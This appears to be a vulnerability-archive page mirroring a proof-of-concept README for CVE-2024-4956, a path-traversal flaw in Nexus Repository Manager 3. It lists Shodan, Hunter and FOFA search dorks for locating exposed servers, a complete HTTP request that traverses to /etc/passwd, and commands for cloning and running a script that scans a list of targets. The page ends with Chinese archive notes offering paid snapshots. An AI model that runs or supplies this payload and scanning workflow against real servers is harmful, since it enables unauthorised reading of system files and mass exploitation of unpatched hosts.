关联漏洞
描述
CVE-2024-4956 : Nexus Repository Manager 3 poc exploit
介绍
# # CVE-2024-4956 : Nexus Repository Manager 3
Dork:
- Shodan:http.html:"Nexus Repository"
- Hunter:product.name="Nexus Repository"
- FOFA:app="Nexus-Repository-Manager"
Poc :
```
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
```

Or you can use this python script for multi scan :
!Put your targets in targets.txt
```
git clone https://github.com/GoatSecurity/CVE-2024-4956.git
cd CVE-2024-4956
pip install -r requirements.txt
python scan.py
```

文件快照
[4.0K] /data/pocs/df7cc66d2fa0978fdf1dbb8ad6dbab52c411ea7e
├── [1003] README.md
├── [ 18] requirements.txt
├── [1.8K] scan.py
└── [ 1] targets.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。